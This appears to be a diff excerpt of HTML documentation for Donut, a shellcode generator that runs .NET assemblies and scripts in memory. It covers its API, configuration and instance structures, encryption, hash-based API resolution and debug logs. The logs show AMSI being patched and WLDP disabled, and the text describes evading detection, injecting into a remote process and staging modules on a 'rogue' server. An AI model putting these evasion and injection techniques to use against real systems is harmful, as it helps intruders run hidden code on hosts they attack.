277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+0
-511
docs/api.md less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
